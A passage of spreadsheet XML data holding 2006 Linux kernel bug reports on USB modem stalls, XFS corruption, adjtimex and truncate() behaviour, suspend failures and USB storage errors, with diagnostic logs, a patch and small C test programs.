UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 20 Region 0: I/O ports at df80 [size=32] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 02:0c.1 Input device controller: Creative Labs SB Live! Game Port (rev 08) Subsystem: Creative Labs Gameport Joystick Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 Region 0: I/O ports at dfe0 [size=8] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- -- cat /proc/scsi/scsi cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3120026AS Rev: 3.05 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3120827AS Rev: 3.43 Type: Direct-Access -- I am following just the indications to submit a bug, i neved had done it before. If you need something more just ask. Is .config file needed? (both of them: 2.6.16-ck11 with no problems and 2.6.17.1+2.6.17-ck1 problematic.</t>
  </si>
  <si>
    <t>EC</t>
  </si>
  <si>
    <t>[USB] [UHCI] speedtouch driver blocks connection.  QH per endpoint</t>
  </si>
  <si>
    <t>2006-06-27 01:43 UTC</t>
  </si>
  <si>
    <t>2006-11-26 07:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: Debian Hardware Environment: Speedtocuh USB ADSL modem Software Environment: ATM routed IP Problem Description: From 2.6.17 the speedtouch driver blocks the conection. Steps to reproduce: Download at the maximun transfer rate with a big file apt-get -y install tex --&gt; 106K At some point in the download process, it stop. wave:/usr/src/bughunting# atmdiag Itf TX_okay TX_err RX_okay RX_err RX_drop 0 AAL0 0 0 0 0 0 AAL5 2429 0 6936 0 0 wave:/usr/src/bughunting# atmdiag Itf TX_okay TX_err RX_okay RX_err RX_drop 0 AAL0 0 0 0 0 0 AAL5 2433 0 6936 0 0 Only send ATM cells Bisection: wave:/usr/src/bughunting# git bisect bad dccf4a48d47120a42382ba526f1a0848c13ba2a4 is first bad commit commit dccf4a48d47120a42382ba526f1a0848c13ba2a4 Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Sat Dec 17 17:58:46 2005 -0500 [PATCH] UHCI: use one QH per endpoint, not per URB This patch (as623) changes the uhci-hcd driver to make it use one QH per device endpoint, instead of a QH per URB as it does now. Numerous areas of the code are affected by this. For example, the distinction between "queued" URBs and non-"queued" URBs no longer exists; all URBs belong to a queue and some just happen to be at the queue's head. Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;</t>
  </si>
  <si>
    <t>little typo in net/ipv4/netfilter/Kconfig</t>
  </si>
  <si>
    <t>2006-06-27 04:17 UTC</t>
  </si>
  <si>
    <t>Dmytro Bagrii</t>
  </si>
  <si>
    <t>2006-09-07 05:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: I don't know Problem Description: Typo in net/ipv4/netfilter/Kconfig:309 In help section of config option IP_NF_MATCH_HASHLIMIT it is written: "this match dynamically crates a hash table". I think it means "creates" instead of "crates"</t>
  </si>
  <si>
    <t>S3: suspend freeze if tg3 netconsole (both mainline and +acpi-release-20060608)</t>
  </si>
  <si>
    <t>2.6.17.1 mainline</t>
  </si>
  <si>
    <t>2006-06-27 08:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: 2.6.17.1 without acpi-release-20060608-2.6.17 Hardware Environment: ThinkPad T43 2687 Software Environment: Debian Problem Description: Upon suspend-to-ram with the netconsole loaded, the system will deadlock with this message: acpi_bus-0201 (i.e. the rest of the acpi_bus-0201 message is NOT printed). Steps to reproduce: Load netconsole, verify that it is working over ethernet (tg3 on pciexpress). Suspend-to-ram (S3).</t>
  </si>
  <si>
    <t>repeated slight XFS corruption</t>
  </si>
  <si>
    <t>2006-06-27 15:12 UTC</t>
  </si>
  <si>
    <t>2006-07-28 03:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Not easy to say, cause I had lots of XFS corruption problems in the last months. Most prominent kernel bug #6380. But I had XFS crash with 2.6.15.7 as well with *disabled write caches* This slight kind of corruption however seems to be new with 2.6.17.1. I am not absolutely sure, but I think I did not have it with 2.6.16.11, 2.6.16.4 and 2.6.15.7. Well better a slight corruption without lost+found files than what I had before ;) Distribution: Debian Etch / Sid / Experiment (almost nothing from experimental) Hardware Environment: IBM ThinkPad T23, Pentium III 1.13 GHz, 384 MB RAM (lspci stuff attached) Software Environment: 2.6.17.1 + sws2 patches... Problem Description: XFS seems to get corrupted slightly after some days. Well, right now I only had it twice... once last friday and once today. Steps to reproduce: Frankly I have no idea. It just happens. But it only happened in the root partition. /home fortunately has been unaffected by this. Details: It first happened last Friday, see my post on linux-xfs mailinglist: Re: xfs crash with linux 2.6.15.7 and disabled write caches (long) Message-Id: &lt;200606232201.29440.Martin@lichtvoll.de&gt; It again happened today and I have quite some diagnostic date at hand: I halted the computer regularily after some suspend / resume cycles (software suspend 2), cause it seems this way I can detect filesystem corruption more easily (for example when KDE crashes upon shutdown has been a good indicator). I got some kernel messages on tty0, which I found in /var/log/syslog later on. As a sample here the first occurence I found in the log - I attach the whole portion of the log file to this bug report: --------------------------------------------------------------- Jun 27 23:34:00 deepdance shutdown[18694]: shutting down for system halt Jun 27 23:34:02 deepdance kernel: 0x0: 00 00 00 7e 1f 69 00 00 17 62 03 00 ff ff 07 00 Jun 27 23:34:02 deepdance kernel: Filesystem "hda5": XFS internal error xfs_da_do_buf(2) at line 2212 of file fs/xfs/xfs_da_btree.c. Caller 0xc020b60d Jun 27 23:34:02 deepdance kernel: &lt;c021ea5b&gt; xfs_corruption_error+0x10b/0x140 &lt;c020b60d&gt; xfs_da_read_buf+0x3d/0x50 Jun 27 23:34:02 deepdance kernel: &lt;c024f7c1&gt; kmem_zone_alloc+0x61/0xe0 &lt;c020a869&gt; xfs_da_buf_make+0x159/0x160 Jun 27 23:34:02 deepdance kernel: &lt;c020b4bb&gt; xfs_da_do_buf+0x8bb/0x960 &lt;c020b60d&gt; xfs_da_read_buf+0x3d/0x50 Jun 27 23:34:02 deepdance kernel: &lt;c020b60d&gt; xfs_da_read_buf+0x3d/0x50 &lt;c0214ebc&gt; xfs_dir2_leaf_lookup_int+0x6c/0x2d0 Jun 27 23:34:02 deepdance kernel: &lt;c0214ebc&gt; xfs_dir2_leaf_lookup_int+0x6c/0x2d0 &lt;c01f8193&gt; xfs_bmap_last_offset+0x133/0x160 Jun 27 23:34:02 deepdance kernel: &lt;c021564d&gt; xfs_dir2_leaf_lookup+0x2d/0xc0 &lt;c021098a&gt; xfs_dir2_lookup+0x13a/0x160 Jun 27 23:34:02 deepdance kernel: &lt;c0148a16&gt; generic_file_buffered_write+0x3b6/0x6e0 &lt;c02435ac&gt; xfs_dir_lookup_int+0x4c/0x150 Jun 27 23:34:02 deepdance kernel: &lt;c017843f&gt; do_lookup+0x5f/0x180 &lt;c0247c9e&gt; xfs_lookup+0x7e/0xc0 Jun 27 23:34:02 deepdance kernel: &lt;c02576bc&gt; xfs_vn_lookup+0x4c/0xa0 &lt;c0178533&gt; do_lookup+0x153/0x180 Jun 27 23:34:02 deepdance kernel: &lt;c0178dfd&gt; __link_path_walk+0x89d/0xfa0 &lt;c0256e86&gt; xfs_vn_permission+0x26/0x30 Jun 27 23:34:02 deepdance kernel: &lt;c017955c&gt; link_path_walk+0x5c/0x100 &lt;c0105d5a&gt; do_gettimeofday+0x1a/0xd0 Jun 27 23:34:02 deepdance kernel: &lt;c011d1ec&gt; sys_gettimeofday+0x3c/0xb0 &lt;c0179a27&gt; do_path_lookup+0xa7/0x270 Jun 27 23:34:02 deepdance kernel: &lt;c017712f&gt; getname+0xdf/0x110 &lt;c017a26c&gt; __user_walk_fd+0x3c/0x70 Jun 27 23:34:02 deepdance kernel: &lt;c0166daa&gt; sys_faccessat+0xfa/0x180 &lt;c0105d5a&gt; do_gettimeofday+0x1a/0xd0 Jun 27 23:34:02 deepdance kernel: &lt;c011d1ec&gt; sys_gettimeofday+0x3c/0xb0 &lt;c0166e4f&gt; sys_access+0x1f/0x30 Jun 27 23:34:02 deepdance kernel: &lt;c0103027&gt; syscall_call+0x7/0xb --------------------------------------------------------------- Write caches have been disabled all the time: --------------------------------------------------------------- root@deepdance:~ -&gt; hdparm -I /dev/hda | grep -i "write cache" Write cache (No asterik on front of it means disabled...) --------------------------------------------------------------- Mount options are: defaults,barrier,logbufs=8 I booted into an SUSE 10.1 installation with SUSE kernel 2.6.16.13-4-default. Mount options for the Debian partition are the same as above. Write caches should have been disabled by an init script I wrote... strange is just the output of hdparm: --------------------------------------------------------------- deepdance:~ # hdparm -W0 /dev/hda /dev/hda: setting drive write-caching to 0 (off) HDIO_SET_WCACHE(wcache) failed: Success --------------------------------------------------------------- (This doesn't happen under Debian. Maybe I should try blktool wcache off, I can test whether write cache has been successfully disabled under SUSE using hdparm -I /dev/hda as well, but I believe it is, also the barrier mount option is used, so things should be safe anyway).... xfs_check reported errors like this (full output attached): --------------------------------------------------------------- deepdance:~ # xfs_check /dev/hda5 bad free block nvalid/nused 6/-1 for dir ino 5012689 block 16777216 missing free index for data block 0 in dir ino 5012689 missing free index for data block 1 in dir ino 5012689 missing free index for data block 2 in dir ino 5012689 missing free index for data block 3 in dir ino 5012689 missing free index for data block 4 in dir ino 5012689 missing free index for data block 5 in dir ino 5012689 bad free block nvalid/nused 21/-1 for dir ino 33641428 block 16777216 --------------------------------------------------------------- xfs_repair was able to repair it and printed messages like this: --------------------------------------------------------------- empty data block 53 in directory inode 55176185: junking block empty data block 54 in directory inode 55176185: junking block empty data block 56 in directory inode 55176185: junking block empty data block 58 in directory inode 55176185: junking block empty data block 60 in directory inode 55176185: junking block empty data block 63 in directory inode 55176185: junking block empty data block 64 in directory inode 55176185: junking block free block 16777216 entry 52 for directory ino 55176185 bad rebuilding directory inode 55176185 free block 16777216 for directory inode 48409589 bad nused rebuilding directory inode 48409589 --------------------------------------------------------------- I already thought about hardware problems and tried 1) badblocks -s -v -n -o /home/martin/XFS-Probleme/badblocks.txt /dev/hda5 It found no bad blocks 2) smartctl -t long /dev/hda It completed successfully 3) memtest86 over night It found 0 errors. So I am pretty sure that the hardware is well. Regards, Martin</t>
  </si>
  <si>
    <t>adjtimex broken when delta is NULL</t>
  </si>
  <si>
    <t>2006-06-28 06:07 UTC</t>
  </si>
  <si>
    <t>Michael Kerrisk</t>
  </si>
  <si>
    <t>2007-12-11 13:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: occurs in all kernels (also in 2.6.17) Distribution: n/a (most recently tested on SUSE 10.0) Hardware Environment: x86 (and probably all others) Software Environment: Problem Description: A long standing bug in the adjtimex() system call causes glibc's adjtime(3) function to deliver the wrong results if 'delta' is NULL. The adjtime(3) manual page says If olddelta is not NULL, then the buffer that it points to is used to return the amount of time remaining from any previous adjustment that has not yet been completed. The FreeBSD manual pages says similar: If olddelta is not a null pointer, the structure pointed to will contain, upon return, the number of microseconds still to be corrected from the earlier call. This information should be returned in 'olddelta' regardless of whether the 'delta' argument is or is not NULL. However, Linux/glibc only returns valid information in 'olddelta' if 'delta' is non-NULL; in other words it is only possible to enquire about 'olddelta' if we at the same time change 'delta'. FreeBSD does not have this limitation. The problem lies in the implementation of adjtimex(). I earlier suggested a fix for this problem: --- time.c.orig 2006-03-12 11:03:10.000000000 +1300 +++ time.c 2006-03-12 11:04:26.000000000 +1300 @@ -375,7 +375,9 @@ result = TIME_ERROR; - if ((txc-&gt;modes &amp; ADJ_OFFSET_SINGLESHOT) == ADJ_OFFSET_SINGLESHOT) + if(txc-&gt;modes == 0) + txc-&gt;offset = time_adjust; + else if ((txc-&gt;modes &amp; ADJ_OFFSET_SINGLESHOT) == ADJ_OFFSET_SINGLESHOT) txc-&gt;offset = save_adjust; else { txc-&gt;offset = shift_right(time_offset, SHIFT_UPDATE); (the patch line numbers are wrong for 2.6.17, but the fix is the same.) I made that suggestion in 2002: http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=102404614411225&amp;w=2 Some follow up acknowledged the problem but implied that the fix is more complex (and put off until later): http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=103674954619484&amp;w=2 http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=103689681229548&amp;w=2 But later has never come, and the problem still exists. It should be fixed. There is also a relevant glibc report that I made to get further background on this point: http://sourceware.org/bugzilla/show_bug.cgi?id=2449 . Steps to reproduce: This problem can be demonstrated with the following program: /* t_adjtime.c */ #define _GNU_SOURCE #include &lt;sys/time.h&gt; #include &lt;sys/types.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; int main(int argc, char *argv[]) { struct timeval delta, oldDelta, *deltap; oldDelta.tv_sec = oldDelta.tv_usec = 0; delta.tv_sec = (argc &gt; 1) ? atoi(argv[1]) : 0; delta.tv_usec = (argc &gt; 2) ? atoi(argv[2]) : 0; if (argc &gt; 1) deltap = &amp;delta; else deltap = NULL; if (adjtime(deltap, &amp;oldDelta) == -1) { perror("adjtime"); exit(EXIT_FAILURE); } printf("old delta %ld.%06ld\n", oldDelta.tv_sec, oldDelta.tv_usec); exit(EXIT_SUCCESS); } /* main */ If given command-line arguments, this program uses them to initialise 'delta'. If no arguments are supplied then delta is specified as NULL. In either case, the program prints the information returned in 'olddelta'. On Linux we see something like the following: # ./t_adjtime 2 old delta 0.000000 # ./t_adjtime old delta 0.000000 The last line of output shows the problem. When we do similar on FreeBSD, we see something like the following # ./t_adjtime 2 old delta 0.000000 # ./t_adjtime old delta 1.990000 == END ==</t>
  </si>
  <si>
    <t>ASUS Bios not detecting SMBus PCI Device</t>
  </si>
  <si>
    <t>2006-06-28 21:36 UTC</t>
  </si>
  <si>
    <t>Conrad Williams</t>
  </si>
  <si>
    <t>2006-08-05 00:52 UTC</t>
  </si>
  <si>
    <t>CPUFREQ doesn't work in 2.6.17 kernel (Pentium M CPU)</t>
  </si>
  <si>
    <t>2.6.17, 2.6.18-rc1</t>
  </si>
  <si>
    <t>2006-06-29 00:54 UTC</t>
  </si>
  <si>
    <t>2006-08-10 09:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: Debian testing Hardware Environment: Pentium M, Intel board Software Environment: Debian testing Problem Description: CPUFREQ stopped working in 2.6.17, before worked Steps to reproduce:</t>
  </si>
  <si>
    <t>truncate() does not update ctime and mtime when file is extended</t>
  </si>
  <si>
    <t>2006-06-29 23:54 UTC</t>
  </si>
  <si>
    <t>2008-09-22 16:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: don't know Distribution: SUSE 10.0 Hardware Environment: x86 Software Environment: Problem Description: POSIX requires that truncate() only change the ctime and mtime on the file if the file size actually change. On ext2 and ext3, this seems to work as required. However, Reiserfs is broken: it only updates the file timestamps if a file is shrunk. If the file size remains the same the timestamps are not changed (correct), but if the file size increases, the timestamps are also not changed (wrong). Steps to reproduce: Something like the following can be used to test: ... int main(int argc, char *argv[]) { if (truncate(argv[1], atoi(argv[2])) == -1) perror("truncate") }</t>
  </si>
  <si>
    <t>truncate() updates timestamps even if file size does not change</t>
  </si>
  <si>
    <t>2006-06-29 23:58 UTC</t>
  </si>
  <si>
    <t>2008-09-22 16:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: SUSE 10.0 Hardware Environment: x86 Software Environment: Problem Description: POSIX requires that truncate() only change the ctime and mtime on the file if the file size actually changes (see "man 3p truncate"). On ext2 and ext3, this seems to work as required. However, ox XFS, truncate() changes the timestamps of the file even if the file size remains unchanged. This should not happen. Steps to reproduce: Something like the following can be used to test: ... int main(int argc, char *argv[]) { if (truncate(argv[1], atoi(argv[2])) == -1) perror("truncate") }</t>
  </si>
  <si>
    <t>suspend to ram fails when process is being debugged</t>
  </si>
  <si>
    <t>2.6.17-mm6</t>
  </si>
  <si>
    <t>2006-07-03 14:49 UTC</t>
  </si>
  <si>
    <t>Jeremy Fitzhardinge</t>
  </si>
  <si>
    <t>2006-09-08 04:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: not sure Distribution:FC6 (devel) Hardware Environment:Lenovo Thinkpad X60 Software Environment: Problem Description: When a process is being debugged (stopped in a breakpoint, for example), suspend fails. Steps to reproduce: Start program under gdb. Set breakpoint. Run program until it hits breakpoint. Attempt to suspend.</t>
  </si>
  <si>
    <t>kobject_add failed with -EEXIST</t>
  </si>
  <si>
    <t>2006-07-05 09:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-mm5 Distribution: Gentoo Linux Hardware Environment: HP Compaq nx6125 laptop with AMD Athhlon 64 Problem Description: After booting with this kernel I get this output in dmesg: Allocate Port Service[0000:00:04.0:pcie0] Allocate Port Service[0000:00:04.0:pcie0] kobject_add failed for 0000:00:04.0:pcie0 with -EEXIST, don't try to register things with the same name in the same directory. [&lt;c0103afb&gt;] show_trace+0x1b/0x20 [&lt;c0104226&gt;] dump_stack+0x26/0x30 [&lt;c02ea1c5&gt;] kobject_add+0x135/0x1c0 [&lt;c033c751&gt;] device_add+0xb1/0x4b0 [&lt;c033cb6a&gt;] device_register+0x1a/0x20 [&lt;c02fdd63&gt;] pcie_port_device_register+0x2d3/0x3b0 [&lt;c02fdf9d&gt;] pcie_portdrv_probe+0x4d/0x90 [&lt;c02fade4&gt;] pci_device_probe+0x64/0x80 [&lt;c033e60a&gt;] driver_probe_device+0x4a/0xe0 [&lt;c033e79f&gt;] __driver_attach+0x6f/0x80 [&lt;c033df07&gt;] bus_for_each_dev+0x57/0x80 [&lt;c033e528&gt;] driver_attach+0x28/0x30 [&lt;c033da99&gt;] bus_add_driver+0x89/0x170 [&lt;c033ea57&gt;] driver_register+0xa7/0xf0 [&lt;c02fafc2&gt;] __pci_register_driver+0x62/0x90 [&lt;c05d1700&gt;] pcie_portdrv_init+0x20/0x40 [&lt;c010029f&gt;] init+0x7f/0x260 [&lt;c0100795&gt;] kernel_thread_helper+0x5/0x10 This message is repeated repeated again for [0000:00:04.0:pcie0] and then also for [0000:00:05.0:pcie0].</t>
  </si>
  <si>
    <t>2.6.18-rc1</t>
  </si>
  <si>
    <t>2.6.17.7</t>
  </si>
  <si>
    <t>lspci missing my CardBus Ether card</t>
  </si>
  <si>
    <t>2.6.17.3</t>
  </si>
  <si>
    <t>2006-07-07 07:11 UTC</t>
  </si>
  <si>
    <t>TAKADA Yoshihito</t>
  </si>
  <si>
    <t>2006-11-09 16:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.16.20 Distribution:Fedora Core 5 Hardware Environment:Cyrix/MediaGX, CS5520(SouthBridge), Ricoh RL5c475 Software Environment:kernel 2.6.17.3 Problem Description: kernel can't found CardBus card. From /proc/ioports, kernel 2.6.17 excludes region. dmesg of kernel 2.6.16.20: pccard: CardBus card inserted into slot 0 cs: IO port probe 0x3d4-0x4ff: excluding 0x47c-0x493 0x4cc-0x4d3 cs: IO port probe 0x3c0-0x3d2: clean. cs: IO port probe 0x100-0x3af: excluding 0x398-0x39f cs: IO port probe 0xc00-0xcff: clean. cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0xa00-0xaff: clean. dmesg of kernel 2.6.17.3: pccard: CardBus card inserted into slot 0 cs: IO port probe 0x3d4-0x4ff: excluding 0x47c-0x493 0x4cc-0x4d3 cs: IO port probe 0x3c0-0x3d2: clean. cs: IO port probe 0x100-0x3af: excluding 0x398-0x39f cs: IO port probe 0xc00-0xcff: excluding 0xcf8-0xcff cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0xa00-0xaff: clean. /proc/ioports of 2.6.16.20 0cf8-0cff : PCI conf1 1000-10ff : PCI CardBus #01 1000-10ff : 0000:01:00.0 1000-10ff : 8139too /proc/ioports of 2.6.17.3 1000-10ff : PCI CardBus #01 1400-14ff : PCI CardBus #01 Why will not 2.6.17-kernel assign "PCI conf1" region? Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI sleeping with interrupts disabled</t>
  </si>
  <si>
    <t>2006-07-10 15:52 UTC</t>
  </si>
  <si>
    <t>Motherboard is K7S5A with AMD Duron processor. As discussed elsewhere, during resume the system faults in acpi_os_wait_semaphore() at a time when interrupts are disabled. When I patch the routine by setting timeout to 0 if irq_disabled(), the same thing happens in acpi_evaluate_integer(). One bright spot is that with 2.6.18-rc1 these faults no longer cause an interrupt storm, as happens in 2.6.17. I will attach dmesg logs of the bootup and the two suspend-to-disk attempts.</t>
  </si>
  <si>
    <t>USB errors and "reset high speed USB device"</t>
  </si>
  <si>
    <t>2006-07-11 06:06 UTC</t>
  </si>
  <si>
    <t>Hendryk</t>
  </si>
  <si>
    <t>2007-06-14 06:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: Suse 10.1 (but with kernel 2.6.17.1 from www.kernel.org) Hardware Environment: IBM ThinkPad X41 with LaCie slimline DVD+-RW Dual Layer DVD writer (USB 2.0, purchased July 2005) and some 1GB memory sticks (USB 2.0) Problem Description: Write errors when large files are transferred; sometimes no useful error message; in some cases "reset high speed USB device"; details see below I think this is a software problem because: * the same LaCie DVD writer works under Windows * the same 1GB USB sticks work under Windows * various USB 2.0 memory sticks with 128 MB or less work fine I have google'd for the error message "Reset high speed USB device", and it seems that everyone is confused. So I compiled and installed the most recent kernel (2.6.17.1), and I can reproduce the errors. Steps to reproduce: (A) with the DVD writer: ------------------------ Boot the computer. Connect the DVD writer. /var/log/messages says: Jun 26 00:29:03 myhost kernel: usb 1-3: new high speed USB device using ehci_hcd and address 3 Jun 26 00:29:03 myhost kernel: usb 1-3: configuration #1 chosen from 1 choice Jun 26 00:29:03 myhost kernel: Initializing USB Mass Storage driver... Jun 26 00:29:03 myhost kernel: scsi2 : SCSI emulation for USB Mass Storage devices Jun 26 00:29:03 myhost kernel: usb-storage: device found at 3 Jun 26 00:29:03 myhost kernel: usb-storage: waiting for device to settle before scanning Jun 26 00:29:03 myhost kernel: usbcore: registered new driver usb-storage Jun 26 00:29:03 myhost kernel: USB Mass Storage support registered. Jun 26 00:29:08 myhost kernel: Vendor: _NEC Model: DVD+-RW ND-6650A Rev: 1.23 Jun 26 00:29:08 myhost kernel: Type: CD-ROM ANSI SCSI revision: 00 Jun 26 00:29:08 myhost kernel: sr0: scsi3-mmc drive: 24x/24x writer cd/rw xa/form2 cdda tray Jun 26 00:29:08 myhost kernel: Uniform CD-ROM driver Revision: 3.20 Jun 26 00:29:08 myhost kernel: sr 2:0:0:0: Attached scsi CD-ROM sr0 Jun 26 00:29:08 myhost kernel: sr 2:0:0:0: Attached scsi generic sg1 type 5 Jun 26 00:29:08 myhost kernel: usb-storage: device scan complete When I do a "growisofs -Z /dev/sr0 -R -J &lt;some_file&gt;", the step motor of the DVD drive clicks like it is going to a park position. This happens a few times, the drive speeds up and slows down a few times, all this sounds a little unhealthy, and then I get an error before the DVD burning starts: /dev/sr0: "Current Write Speed" is 4.1x1385KBps. :-( unable to WRITE@LBA=0h: Input/output error :-( write failed: Input/output error /var/log/messages says nothing else but Jun 26 00:30:53 myhost kernel: usb 1-3: reset high speed USB device using ehci_hcd and address 3 I know that very similar errors can be caused by the "hald" deamon. Apparently, this program regularly probes the USB bus for new devices and somehow interfers with the DVD writing. In my case, the "hald" was switched off all the time ! I can get the LaCie USB device to work only with kernel 2.6.16.11 (from www.kernel.org) and only when I follow a strange recipe. It is weird, but reproducible. * boot the computer * connect the DVD writer * do a "growisofs", get the same error as above * disconnect the DVD writer and connect it again * do another "growisofs" * this one works! I get a DVD burned without any errors. * further attempts to "growisofs" all fail unless I reboot and follow the procedure from the beginning (B) problems with the 1GB memory sticks --------------------------------------- When I copy a single large file to the USB memory stick with cp &lt;some_file&gt; /media/usb/&lt;filename&gt; I get (after about 600 MB of copying) the following error: cp: failed to preserve ownership of '/media/usb/&lt;filename&gt;': Operation not permitted. But there is nothing in /var/log/messages. I'd be most grateful if someone could help. I am happy to provide any additional data you require or more verbose error messages (if you tell me how to activate that feature). Finally, some additional info that might help: The following is a similar LaCie slimline DVD+-RW (purchased 09/2004) which works fine: Aug 13 21:42:54 myhost kernel: usb 1-3: new high speed USB device using ehci_hcd and address 5 Aug 13 21:42:54 myhost kernel: scsi4 : SCSI emulation for USB Mass Storage devices Aug 13 21:42:54 myhost kernel: usb-storage: device found at 5 Aug 13 21:42:54 myhost kernel: usb-storage: waiting for device to settle before scanning Aug 13 21:42:59 myhost kernel: Vendor: _NEC Model: DVD+-RW ND-6500A Rev: 2.22 Aug 13 21:42:59 myhost kernel: Type: CD-ROM ANSI SCSI revision: 00 Aug 13 21:42:59 myhost kernel: sr0: scsi3-mmc drive: 24x/24x writer cd/rw xa/form2 cdda tray Aug 13 21:42:59 myhost kernel: Attached scsi CD-ROM sr0 at scsi4, channel 0, id 0, lun 0 Aug 13 21:42:59 myhost kernel: Attached scsi generic sg1 at scsi4, channel 0, id 0, lun 0, type 5 Aug 13 21:42:59 myhost kernel: usb-storage: device scan complete The following is a 128 MB USB stick that always works: Jun 28 00:19:05 myhost kernel: usb 2-3: new high speed USB device using ehci_hcd and address 3 Jun 28 00:19:05 myhost kernel: usb 2-3: configuration #1 chosen from 1 choice Jun 28 00:19:06 myhost kernel: Initializing USB Mass Storage driver... Jun 28 00:19:06 myhost kernel: scsi2 : SCSI emulation for USB Mass Storage devices Jun 28 00:19:06 myhost kernel: usb-storage: device found at 3 Jun 28 00:19:06 myhost kernel: usb-storage: waiting for device to settle before scanning Jun 28 00:19:06 myhost kernel: usbcore: registered new driver usb-storage Jun 28 00:19:06 myhost kernel: USB Mass Storage support registered. Jun 28 00:19:11 myhost kernel: Vendor: LEXAR Model: GEYSER JUMPDRIVE Rev: 1.00 Jun 28 00:19:11 myhost kernel: Type: Direct-Access ANSI SCSI revision: 01 CCS Jun 28 00:19:11 myhost kernel: SCSI device sdb: 251904 512-byte hdwr sectors (129 MB) Jun 28 00:19:11 myhost kernel: sdb: Write Protect is off Jun 28 00:19:11 myhost kernel: sdb: Mode Sense: 23 00 00 00 Jun 28 00:19:11 myhost kernel: sdb: assuming drive cache: write through Jun 28 00:19:11 myhost kernel: SCSI device sdb: 251904 512-byte hdwr sectors (129 MB) Jun 28 00:19:11 myhost kernel: sdb: Write Protect is off Jun 28 00:19:11 myhost kernel: sdb: Mode Sense: 23 00 00 00 Jun 28 00:19:11 myhost kernel: sdb: assuming drive cache: write through Jun 28 00:19:11 myhost kernel: sdb: sdb1 Jun 28 00:19:11 myhost kernel: sd 2:0:0:0: Attached scsi removable disk sdb Jun 28 00:19:11 myhost kernel: sd 2:0:0:0: Attached scsi generic sg1 type 0 Jun 28 00:19:11 myhost kernel: usb-storage: device scan complete And here is one of the 1GB USB memory sticks that doesn't work: Jun 28 00:19:29 myhost kernel: usb 2-3: new high speed USB device using ehci_hcd and address 4 Jun 28 00:19:29 myhost kernel: usb 2-3: configuration #1 chosen from 1 choice Jun 28 00:19:29 myhost kernel: scsi3 : SCSI emulation for USB Mass Storage devices Jun 28 00:19:29 myhost kernel: usb-storage: device found at 4 Jun 28 00:19:29 myhost kernel: usb-storage: waiting for device to settle before scanning Jun 28 00:19:34 myhost kernel: Vendor: USB 2.0 Model: Flash Disk Rev: 2.00 Jun 28 00:19:34 myhost kernel: Type: Direct-Access ANSI SCSI revision: 02 Jun 28 00:19:34 myhost kernel: SCSI device sdb: 2031616 512-byte hdwr sectors (1040 MB) Jun 28 00:19:34 myhost kernel: sdb: Write Protect is off Jun 28 00:19:34 myhost kernel: sdb: Mode Sense: 0b 00 00 08 Jun 28 00:19:34 myhost kernel: sdb: assuming drive cache: write through Jun 28 00:19:34 myhost kernel: SCSI device sdb: 2031616 512-byte hdwr sectors (1040 MB) Jun 28 00:19:34 myhost kernel: sdb: Write Protect is off Jun 28 00:19:34 myhost kernel: sdb: Mode Sense: 0b 00 00 08 Jun 28 00:19:34 myhost kernel: sdb: assuming drive cache: write through Jun 28 00:19:34 myhost kernel: sdb: sdb1 Jun 28 00:19:34 myhost kernel: sd 3:0:0:0: Attached scsi removable disk sdb Jun 28 00:19:34 myhost kernel: sd 3:0:0:0: Attached scsi generic sg1 type 0 Jun 28 00:19:34 myhost kernel: usb-storage: device scan complete For the computer and the LaCie drive that doesn't work, I also include the following output: lspci -vv [...] 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: IBM Unknown device 0565 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 177 Region 4: I/O ports at 1820 [size=32] 00:1d.1 USB Controller: Intel 